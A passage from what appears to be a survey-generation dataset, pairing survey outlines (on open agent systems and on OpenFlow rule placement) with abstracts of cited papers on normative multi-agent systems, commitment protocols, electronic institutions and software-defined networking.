specifying and reasoning about the effects of actions and the persistence (‘inertia') of facts over time. An ‘action description' in ${\mathcal{C}}+$ defines a labelled transition system of a certain kind. $n{\mathcal{C}}+$ (formerly known as $({\mathcal{C}}+)^{++}$) is an extended form of ${\mathcal{C}}+$ designed for representing normative and institutional aspects of (human or computer) societies. The deontic component of $n{\mathcal{C}}+$ provides a means of specifying the permitted (acceptable, legal) states of a transition system and its permitted (acceptable, legal) transitions. We present this component of $n{\mathcal{C}}+$, motivating its details with reference to some small illustrative examples. --- paper_title: Modeling communicative behavior using permissions and obligations paper_content: In order to provide flexible control over agent communication, we propose an integrated approach that involves using positive and negative permissions and obligations to describe both conversation specifications and policies. Conversation specifications are described in terms of the speech acts that an agent can/cannot/must/must not perform based on the sequence of messages received and sent. On the other hand, conversation policies restrict how the specifications are used and are defined over the attributes of the sender, receiver, message content, and context in general. Other policies like management, social, privacy etc. are defined at a higher level of abstraction and restrict the general behavior of agents. Whenever they deal with communication, the higher level policies are translated into conversation policies using the syntax and semantics of the specific communication language being used. Agents use a policy engine for reasoning over conversation specifications and applicable policies in order to decide what communicative act to perform next. Our work is different from existing research in communication policies because it is not tightly coupled to any domain information such as mental states of agents or specific communicative acts.The main contributions of this work include (i) an extensible framework that can support varied domain knowledge and different agent communication languages, and (ii) the declarative representation of conversation specifications and policies in terms of permitted and obligated speech acts. --- paper_title: Role-assignment in open agent societies paper_content: Open systems are characterized by heterogeneous participants which can enter or leave the system at will. Typical examples are e-commerce applications or information agent systems. Agents (e.g. personal assistants for buying things on the Internet) will only temporarily take up roles (e.g. a buyer in on-line auctions). This creates the need to define precisely what it means that an agent "takes up" a role and "enacts" it. In this paper we present ongoing research on the determination of the conditions under which an agent can enact a role and what it means for the agent to enact a role. We define possible relations between roles and agents and discuss architectural and functional changes that an agent must undergo when it enters an open agent system. --- paper_title: ORGANISATIONAL RULES AS AN ABSTRACTION FOR THE ANALYSIS AND DESIGN OF MULTI-AGENT SYSTEMS paper_content: Multi-agent systems can very naturally be viewed as computational organisations. For this reason, we believe organisational abstractions offer a promising set of metaphors and models that can be exploited in the analysis and design of such systems. To this end, the concept of role models is increasingly being used to specify and design multi-agent systems. However, this is not the full picture. In this paper we introduce three additional organisational concepts - organisational rules , organisational structures, and organisational patterns - and discuss why we believe they are necessary for the complete specification of computational organisations. In particular, we focus on the concept of organisational rules and introduce a formalism, based on temporal logic, to specify them. This formalism is then used to drive the definition of the organisational structure and the identification of the organisational patterns. Finally, the paper sketches some guidelines for a methodology for agent-oriented systems based on our expanded set of organisational abstractions. --- paper_title: Rules of encounter: designing conventions for automated negotiation among computers paper_content: Part 1 Machines that make deals: the premise machine encounters social engineering for machines scenarios how does this differ from Al? how does this differ from game theory? Part 2 Interaction mechanisms: the negotiation problem in different domains attributes of negotiation mechanisms assumptions incentive compatibility. Part 3 Task-oriented domains: domain definition attributes and examples a negotiation mechanism evaluation of the negotiation mechanism an alternative, one-step protocol mechanisms that maximize the product of utilities the bottom line. Part 4 Deception-free protocols: non-manipulable negotiation mechanisms probabilistic deals subadditive domains concave domains modular domains summary of incentive compatible mechanisms the bottom line. Part 5 State-oriented domains: side-effects in encounters domain definition attributes and examples a negotiation mechanism worth of a goal conflict resolution semi-co-operative deals in non-conflict situations unified negotiation protocols (UNP) multi-plan deals the hierarchy of deal types - summary unbounded worth of a goal - tidy agents the bottom line. Part 6 Strategic manipulation: negotiation with incomplete information incomplete information about worth of goals using the revelation principle to re-design the mechanisms the bottom line. Part 7 Worth-oriented domains: goal relaxation domain definition one agent best plan negotiation over sub-optimal states examples of worth functions the bottom line. Appendices: strict/tolerant mechanisms some related work proofs. --- paper_title: The ontological properties of social roles in multi-agent systems: definitional dependence, powers and roles playing roles paper_content: In this paper we address the problem of defining social roles in multi-agent systems. Social roles provide the basic structure of social institutions and organizations. We start from the properties attributed to roles both in the multi-agent systems and the Object Oriented community, and we use them in an ontological analysis of the notion of social role. We identify three main properties of social roles. First, they are definitionally dependent on the institution they belong to, i.e. the definition of a role is given inside the definition of the institution. Second, they attribute powers to the agents playing them, like creating commitments for the institutions and the other roles. Third, they allow roles to play roles, in the same way as agents do. Using Input/Output logics, we propose a formalization of roles in multi-agent systems satisfying the three properties we identified. --- paper_title: Security policies for sharing knowledge in virtual communities paper_content: Knowledge management exploits the new opportunities of sharing knowledge among members of virtual communities in distributed computer networks, and knowledge-management systems are therefore modeled and designed as multiagent systems. In this paper, normative multiagent systems for secure knowledge management based on access-control policies are studied. It is shown how distributed access control is realized by means of local policies of access-control systems for documents of knowledge providers, and by means of global community policies regulating these local policies. Moreover, it is shown how such a virtual community of multiple knowledge providers respects the autonomy of the knowledge providers --- paper_title: Law-governed interaction: a coordination and control mechanism for heterogeneous distributed systems paper_content: Software technology is undergoing a transition form monolithic systems, constructed according to a single overall design, into conglomerates of semiautonomous, heterogeneous, and independently designed subsystems, constructed and managed by different organizations, with little, if any, knowledge of each other. Among the problems inherent in such conglomerates, none is more serious than the difficulty to control the activities of the disparate agents operating in it, and the difficulty for such agents to coordinate their activities with each other. We argue that the nature of coordination and control required for such systems calls for the following principles to be satisfied: (1) coordination policies need to be enforced: (2) the enforcement needs to be decentralized; and (3) coordination policies need to be formulated explicitly—rather than being implicit in the code of the agents involved—and they should be enforced by means of a generic, broad spectrum mechanism; and (4) it should be possible to deploy and enforce a policy incrementally, without exacting any cost from agents and activities not subject to it. We describe a mechansim called law-governed interaction (LGI), currently implemented by the Moses toolkit, which has been designed to satisfy these principles. We show that LGI is at least as general as a conventional centralized coordination mechanism (CCM), and that it is more scalable, and generally more efficient, then CCM. --- paper_title: A Social Semantics for Agent Communication Languages paper_content: The ability to communicate is one of the salient properties of agents. Although a number of agent communication languages (ACLs) have been developed, obtaining a suitable formal semantics for ACLs remains one of the greatest challenges of multiagent systems theory. Previous semantics have largely been mentalistic in their orientation and are based solely on the beliefs and intentions of the participating agents. Such semantics are not suitable for most multiagent applications, which involve autonomous and heterogeneous agents, whose beliefs and intentions cannot be uniformly determined. Accordingly, we present a social semantics for ACLs that gives primacy to the interactions among the agents. Our semantics is based on social commitments and is developed in temporal logic. This semantics, because of its public orientation, is essential to providing a rigorous basis for multiagent protocols. --- paper_title: On Computational Social Laws for Dynamic Non-Homogeneous Social Structures paper_content: Abstract Approaches to the coordination of artificial agents may be inspired by observations on human and other natural societies. On the other hand, the introduction and the analysis of general computational models and mechanisms of coordination may shed light on the general theory of coordination. This paper extends a fundamental approach to the coordination of artificial agent societies, the artificial social systems approach, in order to incorporate several features observed in human societies. As a result, the approach becomes more powerful, and illuminating computational results are obtained. An artificial social system is a basic mechanism of coordination. It decreases the need for both centralized control and on-line resolution of conflicts by introducing a set of social laws that enable agents to work individually in a mutually compatible manner. This work extends the existing work on artificial social systems in a variety of directions, (a) We present a model that refers explicitly to social law... --- paper_title: Minimal social laws paper_content: Research on social laws in computational environments has proved the usefulness of the law-based approach for the coordination of multi-agent systems. Though researchers have noted that the imposition of a specification could be attained by a variety of different laws, there has been no attempt to identify a criterion for selection among alternative useful social laws. We propose such a criterion which is based on the notion of minimality. A useful social law puts constraints on the agents' actions in such a way that as a result of these constraints, they are able to achieve their goals. A minimal social law is a useful social law that minimizes the amount of constraints the agents shall obey. Minimal social laws give an agent maximal flexibility in choosing a new behavior as a function of various local changes either in his capabilities or in his objectives, without interfering with the other agents. We show that this concept can be usefully applied to a problem in robotics and present a computational study of minimal social laws. --- paper_title: On the synthesis of useful social laws for artificial agent societies paper_content: We present a general model of social law in a computational system, and investigate some of its properties. The contribution of this paper is twofold. First, we argue that the notion of social law is not epiphenomenal, but rather should be built into the action representation; we then offer such a representation. Second, we investigate the complexity of automatically deriving useful social laws in this model, given descriptions of the agents' capabilities, and the goals they might encounter. We show that in general the problem is NP-complete, and identify precise conditions under which it becomes polynomial. --- paper_title: Choosing Social Laws for Multi-Agent Systems: Minimality and Simplicity paper_content: Abstract The design of social laws for artificial agent societies is a basic approach to coordinating multi-agent systems. It exposes the spectrum between fully-centralized and fully-decentralized coordination mechanisms. Useful social laws set constraints on the agents' activities which allow them to work individually in a mutually compatible manner. The design of useful social laws is a problem of considerable importance. In many cases, several useful social laws might be considered, and we might wish to have some criteria in order to choose among them. In this paper, we present the notions of minimal and simple social laws, which capture two basic criteria for selecting among alternative (useful) social laws, and study these criteria in the framework of basic settings, namely Automated Guided Vehicles and Distributed Computing. We also present results with regard to computational issues related to minimal and simple social laws, and to the relationship between these two concepts. Together, the new insights provided here can be used as a basic framework for the analysis of “good” social laws, and initiate research on the selection among alternative social laws. --- paper_title: Artificial Social Systems paper_content: An artificial social system is a set of restrictions of agents' behaviors in a multi-agent environment. Its role is to allow agents to coexist in a shared environment and pursue their respective goals in the presence of other agents. This paper argues that artificial social systems exist in practically every multi-agent system, and play a major role in the performance and effectiveness of the agents. We propose artificial social systems as an explicit and formal object of study, and investigate several basic issues that arise in their design. --- paper_title: Specifying norm-governed computational societies paper_content: Electronic markets, dispute resolution and negotiation protocols are three types of application domains that can be viewed as open agent societies. Key characteristics of such societies are agent heterogeneity, conflicting individual goals and unpredictable behavior. Members of such societies may fail to, or even choose not to, conform to the norms governing their interactions. It has been argued that systems of this type should have a formal, declarative, verifiable, and meaningful semantics. We present a theoretical and computational framework being developed for the executable specification of open agent societies. We adopt an external perspective and view societies as instances of normative systems. In this article, we demonstrate how the framework can be applied to specifying and executing a contract-net protocol. The specification is formalized in two action languages, the C+ language and the Event Calculus, and executed using respective software implementations, the Causal Calculator and the Society Visualizer. We evaluate our executable specification in the light of the presented case study, discussing the strengths and weaknesses of the employed action languages for the specification of open agent societies. --- paper_title: The Role of Competency Questions in Enterprise Engineering paper_content: We present a logical framework for representing activities, states, time, and cost in an enterprise integration architecture. We define ontologies for these concepts in first-order logic and consider the problems of temporal projection and reasoning about the occurrence of actions. We characterize the ontology with the use of competency questions. The ontology must contain a necessary and sufficient set of axioms to represent and solve these questions. These questions not only characterize existing ontologies for enterprise engineering, but also drive the development of new ontologies that are required to solve the competency questions. --- paper_title: Reasoning about Commitments in the Event Calculus: An Approach for Specifying and Executing Protocols paper_content: Commitments among agents are widely recognized as an important basis for organizing interactions in multiagent systems. We develop an approach for formally representing and reasoning about commitments in the event calculus. We apply and evaluate this approach in the context of protocols, which represent the interactions allowed among communicating agents. Protocols are essential in applications such as electronic commerce where it is necessary to constrain the behaviors of autonomous agents. Traditional approaches, which model protocols merely in terms of action sequences, limit the flexibility of the agents in executing the protocols. By contrast, by formally representing commitments, we can specify the content of the protocols through the agents' commitments to one another. In representing commitments in the event calculus, we formalize commitment operations and domain-independent reasoning rules as axioms to capture the evolution of commitments. We also provide a means to specify protocol-specific axioms through the agents' actions. These axioms enable agents to reason about their actions explicitly to flexibly accommodate the exceptions and opportunities that may arise at run time. This reasoning is implemented using an event calculus planner that helps determine flexible execution paths that respect the given protocol specifications. --- paper_title: Contextualizing commitment protocol paper_content: Commitment protocols are modularized specifications of interactions understood in terms of commitments. Purchase is a classic example of a protocol. Although a typical protocol would capture the essence of the interactions desired, in practice, it should be adapted depending on the circumstances or context and the agents' preferences based on that context. For example, when applying purchase in different contexts, it may help to allow sending reminders for payments or returning goods to obtain a refund. We contextualize a protocol by adapting it via different transformations.Our contributions are the following: (1) a protocol is transformed by composing its specification with a transformer specification; (2) contextualization is characterized operationally by relating the original and transformed protocols; and (3) contextualization is related to protocol compliance. --- paper_title: A Modular Action Description Language for Protocol Composition ∗ paper_content: Protocols are modular abstractions that capture patterns of interaction among agents. The compelling vision behind protocols is to enable creating customized interactions by refining and composing existing protocols. Realizing this vision presupposes (1) maintaining repositories of protocols and (2) refining and composing selected protocols. To this end, this paper synthesizes recent advances on protocols and on the knowledge representation of actions. This paper presents MAD-P, a modular action description language tailored for protocols. MAD-P enables building an aggregation hierarchy of protocols via composition. This paper demonstrates the value of such compositions via a simplified, but realistic, business scenario. --- paper_title: Flexible protocol specification and execution: applying event calculus planning using commitments paper_content: Protocols represent the allowed interactions among communicating agents. Protocols are essential in applications such as electronic commerce where it is necessary to constrain the behaviors of autonomous agents. Traditional approaches, which model protocols in terms of action sequences, limit the flexibility of the agents in executing the protocols. By contrast, we develop an approach for specifying protocols in which we capture the content of the actions through agents' commitments to one another. We formalize commitments in a variant of the event calculus. We provide operations and reasoning rules to capture the evolution of commitments through the agents' actions. Using these rules in addition to the basic event calculus axioms enables agents to reason about their actions explicitly to flexibly accommodate the exceptions and opportunities that arise at run time. This reasoning is implemented using an event calculus planner that helps us determine flexible execution paths that respect the protocol specifications. --- paper_title: Verifying Compliance with Commitment Protocols paper_content: Interaction protocols are specific, often standard, constraints on the behaviors of autonomous agents in a multiagent system. Protocols are essential to the functioning of open systems, such as those that arise in most interesting web applications. A variety of common protocols in negotiation and electronic commerce are best treated as commitment protocols, which are defined, or at least analyzed, in terms of the creation, satisfaction, or manipulation of the commitments among the participating agents.When protocols are employed in open environments, such as the Internet, they must be executed by agents that behave more or less autonomously and whose internal designs are not known. In such settings, therefore, there is a risk that the participating agents may fail to comply with the given protocol. Without a rigorous means to verify compliance, the very idea of protocols for interoperation is subverted. We develop an approach for testing whether the behavior of an agent complies with a commitment protocol. Our approach requires the specification of commitment protocols in temporal logic, and involves a novel way of synthesizing and applying ideas from distributed computing and logics of program. --- paper_title: The Event Calculus Explained paper_content: This article presents the event calculus, a logic-based formalism for representing actions and their effects. A circumscriptive solution to the frame problem is deployed which reduces to monotonic predicate completion. Using a number of benchmark examples from the literature, the formalism is shown to apply to a variety of domains, including those featuring actions with indirect effects, actions with nondeterministic effects, concurrent actions, and continuous change. --- paper_title: An abductive event calculus planner paper_content: Abstract In 1969 Cordell presented his seminal description of planning as theorem proving with the situation calculus. The most pleasing feature of Green's account was the negligible gap between high-level logical specification and practical implementation. This paper attempts to reinstate the ideal of planning via theorem proving in a modern guise. In particular, the paper shows that if we adopt the event calculus as our logical formalism and employ abductive logic programming as our theorem proving technique, then the computation performed mirrors closely that of a hand-coded partial-order planning algorithm. Soundness and completeness results for this logic programming implementation are given. Finally the paper shows that, if we extend the event calculus in a natural way to accommodate compound actions, then using the same abductive theorem proving techniques we can obtain a hierarchical planner. --- paper_title: Commitment Machines paper_content: We develop an approach in which we model communication protocols via commitment machines. Commitment machines supply a content to protocol states and actions in terms of the social commitments of the participants. The content can be reasoned about by the agents thereby enabling flexible execution of the given protocol. We provide reasoning rules to capture the evolution of commitments through the agents' actions. Because of its representation of content and its operational rules, a commitment machine effectively encodes a systematically enhanced version of the original protocol, which allows the original sequences of actions as well as other legal moves to accommodate exceptions and opportunities. We show how a commitment machine can be compiled into a finite state machine for efficient execution, and prove soundness and completeness of our compilation procedure. --- paper_title: A computational theory of normative positions paper_content: The Kanger-Lindahl theory of normative positions attempts to use a combination of deontic logic (the logic of obligation and permission) and a logic of action/agency to give a formal account of obligations, duties, rights, and other complex normative concepts. This paper presents a generalization and further development of this theory, together with methods for its automation and application to practical examples. The resulting theory is intended to be applied in the representation and analysis of laws, regulations, and contracts, in the specification of aspects of computer systems, in multiagent systems, and as a contribution to the formal theory of organizations. Particular attention is paid to representations at varying levels of detail and the relationships that hold between them. The last part presents Norman-G, an automated support system intended to facilitate application of the theory to the analysis of practical problems, with a small example to illustrate its use. --- paper_title: Checking correctness of business contracts via commitments paper_content: Business contracts tend to be complex. In current practice, contracts are often designed by hand and adopted by their participants after, at best, a manual analysis. This paper motivates and formalizes two aspects of contract correctness from the perspective of the preferences of the agents participating in them. A contract is safe for a participant if participating in the contract would not leave the participant worse off than otherwise. More strongly, a contract is beneficial to a participant if participating in the contract would leave the participant better off than otherwise. ::: ::: This paper seeks to partially automate reasoning about the correctness of formally modeled business contracts. It represents contracts formally as a set of commitments. It motivates constraints on how cooperative agents might value the various states of commitments. Further, it shows that such constraints are consistent and promote cooperation. Lastly, it presents algorithms for checking the safety and guaranteed benefits of a contract. --- paper_title: A Social Semantics for Agent Communication Languages paper_content: The ability to communicate is one of the salient properties of agents. Although a number of agent communication languages (ACLs) have been developed, obtaining a suitable formal semantics for ACLs remains one of the greatest challenges of multiagent systems theory. Previous semantics have largely been mentalistic in their orientation and are based solely on the beliefs and intentions of the participating agents. Such semantics are not suitable for most multiagent applications, which involve autonomous and heterogeneous agents, whose beliefs and intentions cannot be uniformly determined. Accordingly, we present a social semantics for ACLs that gives primacy to the interactions among the agents. Our semantics is based on social commitments and is developed in temporal logic. This semantics, because of its public orientation, is essential to providing a rigorous basis for multiagent protocols. --- paper_title: Interaction protocols as design abstractions for business processes paper_content: Business process modeling and enactment are notoriously complex, especially in open settings, where business partners are autonomous, requirements must be continually finessed, and exceptions frequently arise because of real-world or organizational problems. Traditional approaches, which attempt to capture processes as monolithic flows, have proven inadequate in addressing these challenges. We propose (business) protocols as components for developing business processes. A protocol is an abstract, modular, publishable specification of an interaction among different roles to be played by different participants. When instantiated with the participants' internal policies, protocols yield concrete business processes. Protocols are reusable and refinable, thus simplifying business process design. We show how protocols and their composition are theoretically founded in the phi;-calculus. --- paper_title: Formalizing a Language for Institutions and Norms paper_content: One source of trust for physical trading systems is their physical assets and simply their presence. A similar baseline does not exist for electronic trading systems, but one way in which it may be possible to create that initial trust is through the abstract notion of an institution, defined in terms of norms [19] and the scenes within which (software) agents may play roles in different trading activities, governed by those norms. We present here a case for institutions in electronic trading, a specification language for institutions (covering norms, performative structure, scenes, roles, etc.) and its semantics and how this may be mapped into formal languages such as process algebra and various forms of logic, so that there is a framework within which norms can be stated and proven. --- paper_title: Implementing norms in electronic institutions paper_content: Ideally, open multi-agent systems (MAS) involve heterogeneous and autonomous agents whose interactions ought to conform to some shared conventions. The challenge is how to express and enforce such conditions so that truly autonomous agents can adscribe to them. One way of addressing this issue is to look at MAS as environments regulated by some sort of normative framework. There have been significant contributions to the formal aspects of such normative frameworks, but there are few proposals that have made them operational. In this paper a possible step towards closing that gap is suggested. A normative language is introduced which is expressive enough to represent the familiar types of MAS-inspired normative frameworks; its implementation in JESS is also shown. This proposal is aimed at adding flexibility and generality to electronic institutions by extending their deontic components through richer types of norms that can still be enforced on-line. --- paper_title: Verifying norm consistency in electronic institutions paper_content: We elaborate on the verification of properties of electronic institutions, a formalism to define and analyse protocols among agents with a view to achieving global and individual goals. We formally define two kinds of norms, viz., the integrity norms and obligations, and provide a computational approach to assess whether an electronic institution is normatively consistent, that is, we can determine whether its norms prevent norm-compliant executions from happening. For this we strongly rely on the analysis of the dialogues that may occur as agents interact. --- paper_title: Towards a test-bed for trading agents in electronic auction markets paper_content: We present a framework for defining trading scenarios based on fish market auctions. In these scenarios, trading (buyer and seller) heterogeneous (human and software) agents of arbitrary complexity participate in auctions under a collection of standardized market conditions and are evaluated against their actual market performance. We argue that such competitive situations constitute convenient problem domains in which to study issues related with agent architectures in general and agentdbased trading strategies in particular.The proposed framework, conceived and implemented as an extension of FM96.5 (a Javadbased version of the Fishmarket auction house), constitutes a testdbed for trading agents in auction tournament environments, FM97.6.Finally, we illustrate how to generate tournaments with the aid of our testdbed by defining and running a very simple tournament involving a set of rudimentary buyer agents. ---
Title: Specifying Open Agent Systems: A Survey Section 1: Introduction Description 1: Provide an overview of open agent systems, including their characteristics, significance, and examples. Discuss the aim of the paper and the structure of the survey. Section 2: Artificial Social Systems Description 2: Discuss the approach and methodologies of artificial social systems, including the design-time specification of social laws and the properties of social laws. Section 3: Commentary on Artificial Social Systems Description 3: Provide critical commentary on the artificial social systems approach, focusing on permissions, non-conformance, semantics, and computational tasks. Section 4: Enterprise Modelling Description 4: Review the work on modelling computational enterprises/organisations, including the roles, goals, processes, policies, skills, and authority within the organisation. Section 5: Commentary on Enterprise Modelling Description 5: Offer critical comments on enterprise modelling with an emphasis on normative relations, non-compliance, semantics, and computational tasks. Section 6: Commitment Protocols Description 6: Review the concept and formalisation of commitment protocols, including the various semantics and representations used in specifying these protocols. Section 7: Commentary on Commitment Protocols Description 7: Provide a critique of the commitment protocols, focusing on normative relations, non-compliance mechanisms, and the computational support provided by these protocols. Section 8: Electronic Institutions Description 8: Discuss the systematic approach to designing and developing multi-agent systems using Electronic Institutions, including roles, dialogic framework, scenes, performative structure, and normative rules. Section 9: Commentary on Electronic Institutions Description 9: Provide critical analysis of Electronic Institutions, particularly their approach to permissions, obligations, normative rules, non-compliance mechanisms, and computational support. Section 10: Discussion Description 10: Summarise the findings from the reviews of the four approaches, discussing the representation of normative relations, the handling of non-compliance, the expressiveness of the formalisms, and the support for computational tasks.
Rules Placement Problem in OpenFlow Networks: A Survey
8
--- paper_title: Frenetic: a network programming language paper_content: Modern networks provide a variety of interrelated services including routing, traffic monitoring, load balancing, and access control. Unfortunately, the languages used to program today's networks lack modern features - they are usually defined at the low level of abstraction supplied by the underlying hardware and they fail to provide even rudimentary support for modular programming. As a result, network programs tend to be complicated, error-prone, and difficult to maintain. This paper presents Frenetic, a high-level language for programming distributed collections of network switches. Frenetic provides a declarative query language for classifying and aggregating network traffic as well as a functional reactive combinator library for describing high-level packet-forwarding policies. Unlike prior work in this domain, these constructs are - by design - fully compositional, which facilitates modular reasoning and enables code reuse. This important property is enabled by Frenetic's novel run-time system which manages all of the details related to installing, uninstalling, and querying low-level packet-processing rules on physical switches. Overall, this paper makes three main contributions: (1) We analyze the state-of-the art in languages for programming networks and identify the key limitations; (2) We present a language design that addresses these limitations, using a series of examples to motivate and validate our choices; (3) We describe an implementation of the language and evaluate its performance on several benchmarks. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: On the co-existence of distributed and centralized routing control-planes paper_content: Network operators can and do deploy multiple routing control-planes, e.g., by running different protocols or instances of the same protocol. With the rise of SDN, multiple control-planes are likely to become even more popular, e.g., to enable hybrid SDN or multi-controller deployments. Unfortunately, previous works do not apply to arbitrary combinations of centralized and distributed control-planes. In this paper, we develop a general theory for coexisting control-planes. We provide a novel, exhaustive classification of existing and future control-planes (e.g., OSPF, EIGRP, and Open-Flow) based on fundamental control-plane properties that we identify. Our properties are general enough to study centralized and distributed control-planes under a common framework. We show that multiple uncoordinated control-planes can cause forwarding anomalies whose type solely depends on the identified properties. To show the wide applicability of our framework, we leverage our theoretical insight to (i) provide sufficient conditions to avoid anomalies, (ii) propose configuration guidelines, and (iii) define a provably-safe procedure for reconfigurations from any (combination of) control-planes to any other. Finally, we discuss prominent consequences of our findings on the deployment of new paradigms (notably, SDN) and previous research works. --- paper_title: B4: experience with a globally-deployed software defined wan paper_content: We present the design, implementation, and evaluation of B4, a private WAN connecting Google's data centers across the planet. B4 has a number of unique characteristics: i) massive bandwidth requirements deployed to a modest number of sites, ii) elastic traffic demand that seeks to maximize average bandwidth, and iii) full control over the edge servers and network, which enables rate limiting and demand measurement at the edge. These characteristics led to a Software Defined Networking architecture using OpenFlow to control relatively simple switches built from merchant silicon. B4's centralized traffic engineering service drives links to near 100% utilization, while splitting application flows among multiple paths to balance capacity against application priority/demands. We describe experience with three years of B4 production deployment, lessons learned, and areas for future work. --- paper_title: vCRIB: virtualized rule management in the cloud paper_content: Cloud operators increasingly need many fine-grained rules to better control individual network flows for various management tasks. While previous approaches have advocated placing rules either on hypervisors or switches, we argue that future data centers would benefit from leveraging rule processing capabilities at both for better scalability and performance. In this paper, we propose vCRIB, a virtualized Cloud Rule Information Base that allows operators to freely define different management policies without the need to consider underlying resource constraints. The challenge in our approach is the design of a vCRIB manager that automatically partitions and places rules at both hypervisors and switches to achieve a good trade-off between resource usage and performance. --- paper_title: PAST: scalable ethernet for data centers paper_content: We present PAST, a novel network architecture for data center Ethernet networks that implements a Per-Address Spanning Tree routing algorithm. PAST preserves Ethernet's self-configuration and mobility support while increasing its scalability and usable bandwidth. PAST is explicitly designed to accommodate unmodified commodity hosts and Ethernet switch chips. Surprisingly, we find that PAST can achieve performance comparable to or greater than Equal-Cost Multipath (ECMP) forwarding, which is currently limited to layer-3 IP networks, without any multipath hardware support. In other words, the hardware and firmware changes proposed by emerging standards like TRILL are not required for high-performance, scalable Ethernet networks. We evaluate PAST on Fat Tree, HyperX, and Jellyfish topologies, and show that it is able to capitalize on the advantages each offers. We also describe an OpenFlow-based implementation of PAST in detail. --- paper_title: Maturing of OpenFlow and Software Defined Networking through Deployments paper_content: Software-defined Networking (SDN) has emerged as a new paradigm of networking that enables network operators, owners, vendors, and even third parties to innovate and create new capabilities at a faster pace. The SDN paradigm shows potential for all domains of use, including data centers, cellular providers, service providers, enterprises, and homes. Over a three-year period, we deployed SDN technology at our campus and at several other campuses nation-wide with the help of partners. These deployments included the first-ever SDN prototype in a lab for a (small) global deployment. The four-phased deployments and demonstration of new networking capabilities enabled by SDN played an important role in maturing SDN and its ecosystem. We share our experiences and lessons learned that have to do with demonstration of SDN's potential; its influence on successive versions of OpenFlow specification; evolution of SDN architecture; performance of SDN and various components; and growing the ecosystem. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: B4: experience with a globally-deployed software defined wan paper_content: We present the design, implementation, and evaluation of B4, a private WAN connecting Google's data centers across the planet. B4 has a number of unique characteristics: i) massive bandwidth requirements deployed to a modest number of sites, ii) elastic traffic demand that seeks to maximize average bandwidth, and iii) full control over the edge servers and network, which enables rate limiting and demand measurement at the edge. These characteristics led to a Software Defined Networking architecture using OpenFlow to control relatively simple switches built from merchant silicon. B4's centralized traffic engineering service drives links to near 100% utilization, while splitting application flows among multiple paths to balance capacity against application priority/demands. We describe experience with three years of B4 production deployment, lessons learned, and areas for future work. --- paper_title: A Survey of Software-Defined Networking: Past, Present, and Future of Programmable Networks paper_content: The idea of programmable networks has recently re-gained considerable momentum due to the emergence of the Software-Defined Networking (SDN) paradigm. SDN, often referred to as a "radical new idea in networking", promises to dramatically simplify network management and enable innovation through network programmability. This paper surveys the state-of-the-art in programmable networks with an emphasis on SDN. We provide a historic perspective of programmable networks from early ideas to recent developments. Then we present the SDN architecture and the OpenFlow standard in particular, discuss current alternatives for implementation and testing of SDN-based protocols and services, examine current and future SDN applications, and explore promising research directions based on the SDN paradigm. --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies. We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. --- paper_title: Frenetic: a network programming language paper_content: Modern networks provide a variety of interrelated services including routing, traffic monitoring, load balancing, and access control. Unfortunately, the languages used to program today's networks lack modern features - they are usually defined at the low level of abstraction supplied by the underlying hardware and they fail to provide even rudimentary support for modular programming. As a result, network programs tend to be complicated, error-prone, and difficult to maintain. This paper presents Frenetic, a high-level language for programming distributed collections of network switches. Frenetic provides a declarative query language for classifying and aggregating network traffic as well as a functional reactive combinator library for describing high-level packet-forwarding policies. Unlike prior work in this domain, these constructs are - by design - fully compositional, which facilitates modular reasoning and enables code reuse. This important property is enabled by Frenetic's novel run-time system which manages all of the details related to installing, uninstalling, and querying low-level packet-processing rules on physical switches. Overall, this paper makes three main contributions: (1) We analyze the state-of-the art in languages for programming networks and identify the key limitations; (2) We present a language design that addresses these limitations, using a series of examples to motivate and validate our choices; (3) We describe an implementation of the language and evaluate its performance on several benchmarks. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in 